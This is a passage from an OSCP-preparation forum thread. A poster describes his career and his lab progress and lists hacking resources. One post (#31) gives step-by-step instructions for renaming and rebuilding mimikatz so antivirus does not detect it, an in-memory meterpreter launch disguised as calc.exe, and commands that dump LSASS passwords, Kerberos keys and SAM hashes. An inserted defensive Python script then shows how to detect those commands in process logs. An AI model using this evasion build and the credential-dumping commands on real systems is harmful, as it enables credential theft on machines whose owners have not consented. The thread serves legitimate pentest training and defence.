#26 JoJoCal19 (California Kid; Jacksonville, FL; certifications: CISSP, CISM, CISA, CRISC, GCIA, GSEC, CEHv8, CHFIv8, ITIL-F, MSISA, BSBA)
    This thread is great! Thanks for all of the info JollyFrogs. Also, like the_Grinch, I'd like to know what your background is. Also, if it wouldn't be too much trouble, can you list the sources, links and book names you used to learn these pre-sign-up skills? It would be beneficial to myself and others looking at the OSCP.
    Have: CISSP, CISM, CISA, CRISC, GCIA, GSEC, CEHv8, CHFIv8, ITIL-F, BSBA - University of Florida, MSISA - WGU
    Currently Working On: MS Cybersecurity, Learning Python
    Next Up: None
    Reading: Python Crash Course

#27 JollyFrogs (Member)
    Quoting the_Grinch:
        Awesome posts! Let me just commend you on all the work you have done prior to signing up. What's your background?
    Quoting JoJoCal19:
        This thread is great! Thanks for all of the info JollyFrogs. Also, like the_Grinch, I'd like to know what your background is. Also, if it wouldn't be too much trouble, can you list the sources, links and book names you used to learn these pre-sign-up skills? It would be beneficial to myself and others looking at the OSCP.
    Hi The_Grinch and JoJoCal19, I started using computers when I was 7, when my dad bought a Commodore 64 for the family. Although it was a family gift, none of my family members were interested in computers, so I had plenty of time to get acquainted with BASIC and of course play the many games that I was trading with friends. There was no internet back in the day and most programs would be loaded from music cassettes (magnetic tape is still used today to store information, for instance in DLT tapes). I remember tuning in to radio shows that broadcast code which you could record onto cassette and then load into the computer. We're talking WarGames era here, when internet connections still made beeping and screeching noises. Of course my parents never allowed me to use the phone line, so I was limited to one-way traffic from the public radio stations to my dad's Pioneer radio system.

    The above might make me sound old but I'm only 38 (I guess that statement is relative) and have worked with computers my whole life. When I was 20 I was poached by a large corporation to work on IBM Mainframes. This was in the late 1990s and it was a time of plenty; back then companies would hire anyone to work on computers due to a global shortage of IT staff. I started off in the "Tape Setup" department, which was a large library of magnetic DLT tapes, and we would be working in shifts around the clock, watching 3 screens with "batch job requests", essentially tape ID numbers, and running to the correct tape readers to insert these tapes. I have fond memories of Tape Setup. The Tape Setup also served as a prospective pool of future Mainframe operators, and after a few weeks there was an opening as a Mainframe operator in the systems team. I applied and was hired. I worked with mainframes in shifts for around a year and was poached internally by a visionary manager who had just started the "Windows NT department". Our mainframe computer terminals were being replaced by NT workstations at a very fast pace and their department couldn't keep up. I got a job as an NT server administrator. They gave me an MCSE NT 4.0 course and I certified. Shortly after, I was among the first people in the world to certify for Windows 2000 (the only reason I know this is because I received a signed "early achiever" award from Bill Gates). My manager allowed me to study almost non-stop as long as I kept the servers running. I was responsible for about 70 Windows NT servers, and they all ran like clockwork, so I had plenty of time to study.

    (Shortening the story a bit here) After a few years in the Windows server department, I realized that my days as a server administrator would soon be coming to an end as more and more of our systems support was being outsourced to India. As Darwin once said, "It is not the strongest species that survives, but the most adaptable". So I got Cisco certifications and applied for a job in networks support, which I did for a few years. When networking started to get off-shored and outsourced, and with the rise of "the cloud" which virtualizes most of the networking equipment I was supporting, I got into security. Security came naturally to me as most of my setups would take it into account, and having a broad basis of systems knowledge and networks really helped ease the learning curve. I got CISSP certified, did some contracting and freelancing and have settled in an information security job in Brisbane for about a year now. I'm enjoying security and believe this will be my last career switch, having switched twice within the IT field.

    Over the years I have gotten quite a few certifications, partly thanks to employers who saw the benefit in training their staff but mostly because I self-study at home almost every day - I enjoy it and I crave it. My list of certifications includes CCNP, CCDP, CCVP, MCSE, MCDBA, CISSP (the list is quite extensive but those would be my preferred ones; the ones I learnt most from or have gotten most value out of during my career). Every 2 years I get another Cisco certification simply to keep my certs active, the Windows certifications don't expire and I need 40 CPE points per year for my CISSP accreditation. Unfortunately the value of these certifications has dropped significantly with the rise of brain-dumping sites. And that is why I'm doing OSCP now! It's hands-on. No cheating and no brain-dumping: this is a journey that people take alone. This is the "Camino de la Sabatera" of IT certifications: I will value this certificate more than any of the ones I have gotten so far (except perhaps my early achievers award from Bill Gates!). I have learnt so much already even before starting the course.

    Overall I would rate my knowledge coming into the OSCP studies as follows:
    Networks = excellent
    Microsoft = excellent
    Linux = moderate
    Coding = moderate
    Scripting = moderate
    Security (theory) = moderate
    Security (practical) = moderate
    Assembly = low
    Python = zero
    Linux Kali = zero
    Metasploit = zero

    I will list the resources I used to get up to speed in a separate reply. I'm on 904 pages of notes so far in KeepNote so I will just get the most important links that I used.

    EDIT: I posted the links, but I guess the sheer volume of URLs resulted in the post being marked for review by a moderator. If it doesn't get approved - which due to the hackish nature of some of the links is completely understandable - then I will post a pastebin link instead.
    Last edited by JollyFrogs; 06-13-2015 at 04:17 AM.

#28 JollyFrogs (Member)
    As requested, here is a non-exhaustive list of resources I have used so far. Please keep in mind that some of these links have hundreds or thousands of links in them, most of which I would have read. A good resource to start out is the very first link on this website, which has hundreds of interesting links.

    Be warned: This rabbit hole goes deep.

    Interesting reading:
    https://code.google.com/p/pentest-bo.../BookmarksList
    http://resources.infosecinstitute.co...door-python-z/
    https://blog.netspi.com/netspis-top-...ords-for-2014/
    https://github.com/SpiderLabs/Responder
    http://windowssecrets.com/top-story/
    http://resources.infosecinstitute.co...using-ollydbg/
    https://www.corelan.be/index.php/200...t-development/
    http://jbremer.org/mona-101-a-global-samsung-dll/
    http://sgros-students.blogspot.sg/20...cs-part-1.html
    http://sgros-students.blogspot.sg/20...cs-part-2.html
    http://blog.cobaltstrike.com/2014/03...s-should-know/
    http://www.pretentiousname.com/misc/...hitelist2.html
    http://www.pretentiousname.com/misc/...c_details.html
    http://withinwindows.com/2009/02/05/...ated-binaries/
    https://www.exploit-db.com/bypassing...vista7-mirror/
    http://security.stackexchange.com/qu...-for-windows-7
    http://www.primalsecurity.net/0x8-ex...ive-egghunter/
    http://hackerforhire.com.au/
    http://n01g3l.tumblr.com/
    http://veneetbhardwaj.blogspot.sg/
    http://nethekk.blogspot.sg/2014/01/slmail-exploit.html
    https://github.com/samratashok/nishang
    http://j3rge.blogspot.sg/
    https://twitter.com/ithurricanept
    https://github.com/hfiref0x
    http://www.pretentiousname.com/misc/...hitelist2.html
    https://zdresearch.com/internet-expl...rop-genration/
    http://www.justanotherhacker.com/201...web-shell.html
    http://woshub.com/how-to-extract-win...-hiberfil-sys/
    http://rycon.hu/papers/goldenticket.html
    http://www.beneaththewaves.net/Proje...lkthrough.html


    Exploit and vulnerability databases:
    http://www.exploit-db.com
    https://code.google.com/p/google-sec...ry&cells=tiles
    http://packetstormsecurity.com/files/os/7
    https://packetstormsecurity.com/
    http://farlight.org/index.html?type=local


    Restricted shell escape:
    https://blog.netspi.com/breaking-out...ix-and-kiosks/


    Privilege Escalation:
    http://blog.g0tmi1k.com/2011/08/basi...ge-escalation/
    https://blog.netspi.com/windows-priv...or-privileges/
    https://blog.netspi.com/windows-priv...in-privileges/
    http://www.fuzzysecurity.com/tutorials/16.html
    https://www.youtube.com/watch?v=kMG8IsCohHA
    http://www.greyhathacker.net/?p=738
    http://harmj0y.net
    http://www.tarasco.org/


    ROP: ASLR and DEP/NX:
    https://www.trustwave.com/Resources/...X-ASLR-bypass/
    http://security.stackexchange.com/qu...es-aslr-dep-nx
    http://en.wikipedia.org/wiki/Return-...ed_programming
    http://www.mastropaolo.com/2005/06/0...d-bits-part-1/
    https://samsclass.info/127/proj/rop.htm
    http://nicholas.carlini.com/papers/2...ropattacks.pdf
    https://ctf-team.vulnhub.com/picoctf-2014-hardcore-rop/


    Boot to root websites:
    https://exploit-exercises.com/
    http://0daysecurity.com/pentest.html
    http://blog.agupieware.com/2014/10/h...ng-victim.html


    Pentesting blogs:
    https://idzer0.com


    Reconnaissance websites:
    http://whois.domaintools.com/nextdc.com


    Shell codes:
    https://www.exploit-db.com/shellcode/
    http://www.secdev.org/projects/shellforge/
    https://www.corelan.be/index.php/201...2-shellcoding/
    http://www.leidecker.info/downloads/index.shtml#shells
    https://github.com/dotcppfile/Serbot
    http://shell-storm.org/shellcode/
    http://bernardodamele.blogspot.sg/20...ne-liners.html


    Tools to hide Shells:
    https://www.veil-framework.com/


    EggHunters:
    http://www.primalsecurity.net/0x8-ex...ive-egghunter/


    Exploit Development:
    https://github.com/SaltwaterC/sploit-tools
    https://github.com/r41p41/snippets
    https://zdresearch.com/internet-expl...rop-genration/
    https://github.com/byt3bl33d3r/MITMf
    https://www.qualys.com/research/top10/2014/07/


    Password leaks/lists:
    http://www.leakedin.com
    http://securityxploded.com/passwordsecrets.php


    OSCP reviews:
    http://popped.io


    Hash cracking:
    http://forum.insidepro.com/viewforum...72f1dc23055572
    http://www.hashkiller.co.uk

#29 (Member; certifications: CISSP, GSEC, GCED, GWAPT, GISP)
    JollyFrogs, I have been following your adventures in preparing for the OSCP with great interest and enjoyment. Your posts are always a good read, both informational and amusing. I look forward to following your continued adventures, and have been inspired to start my own journey, now in the early getting ready stage. Good luck in this exciting trip!

#30 veritas_libertas (Audentis Fortuna Iuvat; certifications: eCPPT, GPEN, GWAPT, GCIH, CISSP, CCNA (expired), MCTS)
    Great stuff! Keep it coming, I'm sure you will pass.
    Currently working on: Resting

#31 JollyFrogs (Member)
    Bob was a great experience, one thing was bugging me though: When I ran mimikatz "it didn't work". No output, nothing. The command ran then exited without errors. I now know that the desktop must have been full of error dialogs, let's hope Bob wasn't using his computer when I did.

    I had compiled mimikatz from source, and I wondered if that might have broken something. So I fired up a Windows XP SP0 machine and tried the pre-compiled mimikatz version from the inter-webs. Sure thing, the program worked flawlessly. I then ran my compiled version - which I thought should be identical - and when executing mimikatz I got an error screen on the desktop stating that a "DecodePointer" function in Kernel32.dll couldn't be found. I did some research on this error and learnt that the DecodePointer function was only added to kernel32.dll after Windows XP SP2: mystery solved! I added the DecodePointer function to the solution, built it, fired up mimikatz on my Windows XP SP0 machine, and it worked.

    A minor inconvenience was that my antivirus would pick up Mimikatz as malware and delete the file. I proceeded to change the mimikatz code very slightly and I've come up with a version that my antivirus doesn't detect (yet) as a virus. I've attached the complete procedure below in case someone wants to compile Mimikatz from source and runs into the same issue:

    ------------------
    Author: JollyFrogs, Brisbane
    NOTE: Disable all virus-scanners before you start downloading, keep them disabled until your files are compiled


    Get the required programs and files:
    ----------------------------------
    Download: https://github.com/gentilkiwi/mimika...ive/master.zip (Free)
    Download: GRMWDK_EN_7600_1.ISO from Microsoft (Free)
    Download: vs2013.4_ce_enu.iso from Microsoft (Free)
    Download: fnr.exe from https://findandreplace.codeplex.com/...ads/get/809617
    Download: http://mulder.googlecode.com/svn/tru...odePointer.lib (you can optionally compile it from source)


    Install Driver Development Toolkit:
    ---------------------------------
    Extract GRMWDK_EN_7600_1.ISO with 7-zip
    Run KitSetup.exe
    - Click Yes to start the installation
    - Tick "Full Development Environment" and leave all other options unticked
    - Click "OK" in the bottom right
    - Install path: C:\WinDDK\7600.16385.1\
    - Click "OK" in the bottom right
    - Tick "I Agree" in the bottom left and click "OK"
    NOTE: The installation commences
    - Click "Finish" in the "Microsoft WDK Install Progress" screen


    Install Visual Studio 2013 Community Edition:
    -------------------------------------------
    Extract vs2013.4_ce_enu.iso with 7-zip
    Run vs_community.exe
    - Click "Continue" if you get a setup warning
    - Install path: C:\Program Files (x86)\Microsoft Visual Studio 12.0\
    - Tick "I agree to the License Terms and Privacy Policy."
    - Untick "Join the Visual Studio Experience Improvement Program"
    - Click "Next"
    - Tick and then untick "Select All" to select nothing
    - Click "INSTALL"
    - Click "Yes" to close the UAC warning screen
    NOTE: the installation commences
    - Click "LAUNCH" after install completes
    - Click "Not now, maybe later." in the Welcome screen
    - Select "General" and Select "Blue" and Click "Start Visual Studio"


    Prevent AV detection on Mimikatz:
    ---------------------------------
    Extract mimikatz-master.zip to C:\jollykatz\ (you should end up with "C:\jollykatz\mimikatz-master\mimikatz.sln" and a whole bunch of files/folders)


    run the following in a cmd.exe to rename all files and folders from "mimi" to "jolly":
    powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\jollykatz\ -Filter \"*mimi*\" -Recurse | Rename-Item -NewName {$_.name -replace 'mimi','jolly' }}"
    powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\jollykatz\ -Filter \"*kuhl*\" -Recurse | Rename-Item -NewName {$_.name -replace 'kuhl','frog' }}"


    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories"
    File Mask: *.*
    Find: mimi
    replace: jolly
    Click "replace"
    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories"
    File Mask: *.*
    Find: kuhl
    replace: frog
    Click "replace"
    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories"
    File Mask: *.*
    Find: eo.oe.kiwi
    replace: THINC.local
    Click "replace"
    Close fnr.exe


    Copy "EncodePointer.lib" to C:\jollykatz\jollykatz-master\lib\Win32
    Copy "EncodePointer.lib" to C:\jollykatz\jollykatz-master\lib\x64
    NOTE: We're adding "EncodePointer.lib" because WinXP SP0/SP1 would error out with a DecodePointer error caused by compiling with VS2013


    Now we'll build "Jollykatz":
    -------------------------
    - Double-click on "C:\jollykatz\jollykatz-master\jollykatz.sln"
    NOTE: Visual Studio Community Edition opens your project


    - In the "Solution Explorer" window on the right, expand "global files" -> "lib" -> right-click on "Win32" and select "Add" -> "Existing Item"
    - Choose "C:\jollykatz\jollykatz-master\lib\Win32\EncodePointer.lib"
    - In the "Solution Explorer" window on the right, expand "global files" -> "lib" -> right-click on "x64" and select "Add" -> "Existing Item"
    - Choose "C:\jollykatz\jollykatz-master\lib\x64\EncodePointer.lib"


    - In the "Solution Explorer" window on the right, right-click on "jollykatz" (might have to scroll to bottom) and select "Properties"
    - Expand "Configuration Properties" -> "General" -> Set "Use of MFC" to "Use Standard Windows Libraries"
    - Click "Apply" in the bottom
    - Expand "Configuration Properties" -> "C/C++" -> "Code Generation" -> Set "Runtime Library" to "Multi-threaded (/MT)"
    - Click "Apply" in the bottom
    - Expand "Configuration Properties" -> "Linker" -> "Input" -> Add "EncodePointer.lib;" at the start of "Additional Dependencies" (in front of "advapi32.lib")
    - Click "OK" in the bottom


    - In the top menu bar, click "Build" -> "Rebuild Solution"
    NOTE: You should see "Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped"
    NOTE: This means that the 32-bit build succeeded!


    - In the top bar, next to "Release", change "Win32" to "x64"
    - In the top menu bar, click "Build" -> "Rebuild Solution"
    NOTE: You should see "Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped"
    NOTE: This means that the 64-bit build succeeded!


    NOTE: You should now see 5 files in the C:\jollykatz\jollykatz-master\Win32\ directory, of which you will need 3:
    - jollykatz.exe
    - jollylib.dll
    - jollydrv.sys
    NOTE: You should see the same file structure in the C:\jollykatz\jollykatz-master\x64\ directory


    Copy and rename C:\jollykatz\jollykatz-master\Win32\jollykatz.exe to C:\jollykatz\jollykatz32.exe
    Copy and rename C:\jollykatz\jollykatz-master\x64\jollykatz.exe to C:\jollykatz\jollykatz64.exe
    NOTE: Typically, you only need jollykatz.exe, the driver (jollydrv.sys) and library (jollylib.dll) files are optional. If you need the drivers, copy and rename them as well.


    NOTE: Hopefully, your antivirus won't pick up on the new jollykatz.exe files. If it does, you'll need to modify some code. Or use the Veil framework.


    Run Mimikatz from memory through meterpreter (advisable):
    ---------------------------------------------------------
    execute -H -i -c -m -d calc.exe -f jollykatz.exe -a '"privilege::debug" "sekurlsa::logonPasswords full" "exit"'


    How to use:
    ------------


    -- dump clear-text passwords from LSASS process:
    C:\> jollykatz32.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"


    -- Steal users' credentials until they reset their passwords:
    C:\> jollykatz32.exe "privilege::debug" "sekurlsa::ekeys" "exit"


    -- Dump LM and NTLM hashes from SAM:
    C:\> jollykatz32.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"


    -- read SAM file from /repair or ntbackup files:
    C:\> reg save HKLM\SYSTEM SystemBkup.hiv
    C:\> reg save HKLM\SAM SamBkup.hiv
    (Or use Volume Shadow Copy / a boot CD to back up these files, or get them from the repair folder:
    C:\Windows\System32\config\SYSTEM
    C:\Windows\System32\config\SAM)
    C:\> jollykatz32.exe "lsadump::sam SystemBkup.hiv SamBkup.hiv" "exit"
    ------------------
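An added detection example from the defender's side (my code, not JollyFrogs' and not part of the post): the renaming above changes the binary name and its internal "mimi"/"kuhl" strings, but the module commands in the usage section still have to appear on the command line, so process-creation logging with command-line auditing enabled (Windows Security event 4688 or Sysmon event 1) still sees them. The record format and the log lines are constructed for this example; the two scans show why a rule keyed on the tool's file name misses the renamed build while a rule keyed on the command line does not.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed process-creation records for this example (not real telemetry).
# The fields mirror what Windows Security event 4688 or Sysmon event 1 provide
# when command-line auditing is switched on.
SAMPLE_EVENTS = [
    r'2015-06-14T10:02:11Z host=WS01 image=C:\temp\jollykatz32.exe cmdline=jollykatz32.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"',
    r'2015-06-14T10:03:05Z host=WS01 image=C:\Windows\System32\reg.exe cmdline=reg save HKLM\SYSTEM SystemBkup.hiv',
    r'2015-06-14T10:03:09Z host=WS01 image=C:\Windows\System32\reg.exe cmdline=reg save HKLM\SAM SamBkup.hiv',
    r'2015-06-14T10:05:40Z host=WS01 image=C:\Windows\System32\notepad.exe cmdline=notepad.exe C:\Users\bob\notes.txt',
    # Constructed: mimikatz arguments carried by a benign-looking image name.
    # The mismatch between image and arguments is itself worth a look.
    r'2015-06-14T10:06:02Z host=WS02 image=C:\Windows\System32\calc.exe cmdline=calc.exe "privilege::debug" "sekurlsa::ekeys" "exit"',
    r'2015-06-14T10:07:13Z host=WS02 image=C:\Windows\System32\reg.exe cmdline=reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion',
]

# Constructed record layout: "<timestamp> host=<h> image=<path> cmdline=<rest>"
EVENT_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) image=(?P<image>\S+) cmdline=(?P<cmdline>.*)$'
)


@dataclass
class ProcessEvent:
    ts: str
    host: str
    image: str
    cmdline: str


@dataclass
class Finding:
    host: str
    image: str
    rule: str
    evidence: str


def parse_event(line: str) -> Optional[ProcessEvent]:
    """Parse one constructed record; returns None for lines in another format."""
    m = EVENT_RE.match(line)
    return ProcessEvent(**m.groupdict()) if m else None


# Rule 1: the tool's public name in the image path or command line.
# This is exactly the check the "mimi" -> "jolly" renaming defeats.
NAME_RE = re.compile(r'mimikatz', re.IGNORECASE)

# Rule 2: module::command tokens from the usage section. The renaming
# procedure leaves these untouched, and they are needed on the command line
# for the tool to do anything.
MODULE_RE = re.compile(
    r'\b(?:privilege::debug|sekurlsa::\w+|lsadump::\w+|token::elevate)\b',
    re.IGNORECASE,
)

# Rule 3: exporting the hives needed to read the SAM offline, as in the
# "reg save" lines of the usage section.
REG_SAVE_RE = re.compile(
    r'\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b',
    re.IGNORECASE,
)


def name_based_scan(lines: List[str]) -> List[Finding]:
    """File-name/string detection: what the renamed build is meant to evade."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev and (NAME_RE.search(ev.image) or NAME_RE.search(ev.cmdline)):
            findings.append(Finding(ev.host, ev.image, "tool-name", "mimikatz"))
    return findings


def behaviour_scan(lines: List[str]) -> List[Finding]:
    """Command-line detection that survives the renaming."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        m = MODULE_RE.search(ev.cmdline)
        if m:
            findings.append(Finding(ev.host, ev.image, "mimikatz-module-on-cmdline", m.group(0)))
        m = REG_SAVE_RE.search(ev.cmdline)
        if m:
            findings.append(Finding(ev.host, ev.image, "reg-save-credential-hive", m.group(0)))
    return findings


if __name__ == "__main__":
    print("name-based rule:", len(name_based_scan(SAMPLE_EVENTS)), "hit(s)")
    for f in behaviour_scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host} {f.image}: {f.evidence}")
```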

#32 xmalachi (Senior Member; certifications: CISSP, MCITP:EA, Security+, VCA-DCV)
    JollyFrogs, this is easily becoming the most comprehensive OSCP thread on the website. Actually, I'd venture to say that this is the most comprehensive OSCP anything, anywhere. I intend to start my OSCP journey after I complete my degree. I will definitely use this thread as a reference and I look forward to you posting your resources as well as the continued posts as you complete your OSCP. You're an absolute beast already!

#33 JoJoCal19 (California Kid; Jacksonville, FL)
    Awesome background JollyFrogs. I can say that I wish I had had a more varied background before getting into security, as it would have made some things easier for sure. And thanks for the links! I'll definitely have to do a deep dive before I begin OSCP.
    Last edited by JoJoCal19; 06-16-2015 at 06:34 PM.

#34 (Junior Member; BR; certifications: CEH)
    Great thread! I am planning to attempt OSCP soon, right after the eCPPT! All the information here will be very useful for me and I intend to do the same when the time comes!

#35 JollyFrogs (Member)
    My lab access starts this coming Sunday at 10:00 AM Brisbane time, in two days! I feel excited like I was as a kid a few nights before Christmas. The sneak peek during the VPN test confirmed my methodology works for at least one host, and this has given me confidence to build on my initial methodology.

    Over the last few days I've mostly been working on Windows scripts targeting looting and privilege escalation. I haven't put any preparation time into Linux, databases or web applications, so I'll have to get up to speed during lab time. It is my intention to share the scripts I create during my OSCP lab adventures once I confirm they work in the labs.

    "How do I ensure that I don't spoil any of the fun for other OSCP students while still sharing my experience in a meaningful and interesting way?". This is a question that I haven't been able to answer yet, but as I move forward into the labs, I am sure I'll find a good balance between providing useful information and spoiling.

#36 fullcrowmoon (Senior Member; NoVA; certifications: MSM-Proj.Mgmt., MSM-Info.Sys.Sec., ITIL Foun., ITIL SOA, CISSP, CISM)
    This is really a great write-up, JollyFrogs! Thank you for taking the time to keep it up!

#37 JollyFrogs (Member)
    Just a quick write-up: I've started. The email was received at exactly 10:00 AM this morning, so it must be an automatically scheduled tool that sends the email; no complaints here, I was happy to see the email. The username and password to connect via OpenVPN are the same as during the connection test, so if people don't get the email at the right time (due to spam filters, or not being able to access their email account for some reason) then they can probably just log in with the same details they used to test the connection. The IP hasn't changed either, I still have the same dynamic IP I got when I tested, so that saves me time recompiling some of my scripts.

    I took down Alice today. And I reset Bob and had another go at him since I forgot to get the "proof.txt" files. I took down Bob2 as well but that's not really saying much as they are copies (there are copies of "popular" machines, so you can use either the main one or the secondary; very nice of Offsec). The proof.txt key is different though, so since I was going for 100% of the labs, I'll need to get all the machines AND their secondaries.

    Resetting hosts takes a matter of 10 seconds and the image is reset. This is needed for computers that rely on "risky" exploits like... well, when I crashed Alice. You get 8 resets per day, so use them at will.

    Total hosts down so far: 3

#38 JollyFrogs (Member)
    What a rush, I just rooted my first Linux machine! I got stuck on a very difficult one, and while running some time-intensive scans on it, I decided to scan another host, BOOM rooted it, and my other scan isn't even completed yet! Granted it was an easy exploit but it still feels good!

    Total hosts rooted so far: 6

#39 MrAgent (Senior Member; Northern Virginia; certifications: Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP)
    Keep at it! I'd like to see how you do against Sufferance.
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/

#40 (Junior Member; The Flying Dutchman; certifications: Sailing, Digging Holes, Treasure Finding)
    Ahoy there Jolly Frog me matey!!

    I be truly enjoyin' ye fine journey over to th' OSCP land 'o plenty. Ye be a motivin' me to sign up 'n join ye on th' cruise. I likes cruises. Much respect, Davey Jones

#41 JollyFrogs (Member)
    Turns out the machine that had me stumped for the last few days was Ghost. Ghost is Bob's (much) sneakier brother and it took me a while to figure out the puzzle. I spend approx. 2-3 hours after work on the labs. I keep notes of everything I try, and at 20:30 sharp I call it a day. I could go on the whole night of course, but the long-term strategy is to not lose sleep over it. After all, this is brain-work and sleep is essential to keep my head in the game.

    After popping around 7 boxes total, I decided to change my tactics. I had gathered about 15 full credentials, 25 user IDs and 20 passwords in total and I needed to learn Hydra, Medusa, Ncrack and all the other brute-force goodies in the software. So how did it go? Well... to be honest, not very successfully. I did learn a great amount of things though: don't run brute-force tools over VPN. The VPN totally kills the speed (Hydra will do about 800 tries per minute on a webserver, for instance). Instead, it's much better to use the dedicated Windows machine you get in the labs to run a Windows version of Hydra on and let it run in the background while you do other things.

    That said, I have not (yet) been able to find a single password. I know my commands work because if I add a password (that I found via other means) to the list, it finds the password. Brute-forcing is slow, prone to being detected and blocked, locks out accounts permanently with ease, and my main lesson from all this is that it should be used as a method of last resort and not an easy win as I hoped it would be. Strangely, brute-forcing is not nearly as rewarding as cracking a puzzle with brain power. Not to say it can't be effective, but I won't be relying on it as much as I had initially planned to.

    And now, a bit of fun: "JollyFrogs' Pwn Difficulty Rating":
    1 = Obvious misconfiguration that leads to compromise without skill or scripting (empty pass/post-its with passwords)
    2 = All above + Use of precompiled public exploits without modification or compilation (i.e. script kiddies, Metasploit module)
    3 = All above + Use of modified exploits which lead to root access (msfvenom)
    4 = All above + Use of fuzzing and password/hash cracking which lead to root access
    5 = All above + exploits only lead to low privileged account and requires root privilege escalation
    6 = All above + protection evasion (AV/IPS/ASLR/DEP), write or disassemble simple code
    7 = All above + chaining advanced exploits, network pivoting, vlan hopping, arp poisoning, or MITM
    8 = All above + disassembly, debugging and reverse engineering complex and/or protected code
    9 = All above + Requires creation of a new 0day exploit, a new hacking or cracking methodology and expert knowledge in the targeted application
    10 = Hack the Matrix

    Jollyfrogs 1 - Ghost 0
    Total hosts down so far: 9
    Last edited by JollyFrogs; 06-25-2015 at 08:03 AM.

#42 Achieve excellence daily (Washington State; certifications: CISSP)
    Thanks for posting this. Please keep us updated.
    When you go the extra mile, there's no traffic.

#43 JollyFrogs (Member)
    Had to do overtime yesterday on an important project so didn't get to do any puzzling. I've got the whole day today to puzzle, and I'm going to spend the next few hours with Phoenix. I'm learning lots, mostly from google at this point as I'm stuck on the system while trying to escalate privileges. I know "the trick" to escalate, but stringing all the bits and pieces together is proving very time consuming indeed.

    Every time I'm getting closer, I realize that the goal was much further away than I originally thought. The word "mirage" would have been an appropriate word for the experience I'm going through now. I now realize that what I thought was the hard part (getting a limited shell) now seems to have been the easy part. All good fun though, I'm thoroughly enjoying finding the key and will let you know when I find it.

    Edit:
    Thanks Phoenix, you taught me a few valuable lessons!
    Jollyfrogs 1 - Phoenix 0

    Total hosts down: 12
    Last edited by JollyFrogs; 06-28-2015 at 09:24 AM.

#44 MrAgent (Senior Member)
    You're doing well! You've popped more boxes in your first week than I did.
    I am sure you will pass when you go to take the exam.
    Keep it up!

#45 JollyFrogs (Member)
    This is my second week of lab access and I'm thoroughly enjoying the labs. So many hosts, so much to do, puzzles everywhere! I've been on a roll lately, having fine-tuned my approach. During the week I don't have much time and if I can put in 2 hours it's a lot. During weekends I spend about 10 hours per day. I find my original methodology still works, it's sound and makes sense. I have refined it somewhat and will post all my experiences in the labs as I'm keeping notes. I've written around 2000 pages of notes so far! I find that making screenshots isn't as handy as just copy/pasting the actual exploit although I believe OffSec wants at least one screenshot per host.

    I've made a "quick admin access" doc where I can quickly RDP to the hosts or SSH to the hosts using admin passwords that I have recovered. I found that I have used the file more than I expected, going back and forth between hosts. For instance, recently I required a MySQL database, so I fired one up on one of the hosts I had root access on. Haven't touched Humble/Sufferance or Pain yet, as I'm still plucking the low hanging fruit.

    24 hosts down
    1 secret network

#46 M0CAMB0 (Junior Member)
    Hey JollyFrogs, just wanted to chime in and say that, as someone who's just registered for the OSCP fresh out of school with minimal experience in pretty much all of the above, the resources you've provided are really invaluable. Out of all the Google searching I've done, this is hands down the best guide I've ever seen. I hope you continue blogging your journey here!

#47 MrAgent (Senior Member)
    Still on track JollyFrogs?

#48 (Member; certifications: CEH, ECSA, eCPPT)
    Hi JollyFrogs,
    Looking forward to your update if you have time, at your convenience... By the way, after reading through your post I thought of starting my own thread, and I'm now planning to start my OSCP journey... let's see.

#49 JollyFrogs (Member)
    Well, it's the third week in my labs.. and these boxes are definitely getting harder. Currently stuck on Bethany, she's proving to be a real tease!

    Status:
    Total hosts down: 28
    Networks unlocked: 2

#50 (Member; certifications: CEH, ECSA, eCPPT)
    Quoting JollyFrogs (#49):
        Well, it's the third week in my labs.. and these boxes are definitely getting harder. Currently stuck on Bethany, she's proving to be a real tease!

        Status:
        Total hosts down: 28
        Networks unlocked: 2
    JollyFrogs, amazing to see the total hosts down at 28... Sounds encouraging... Keep up the good work... As you aimed, you will take all the machines... Good luck...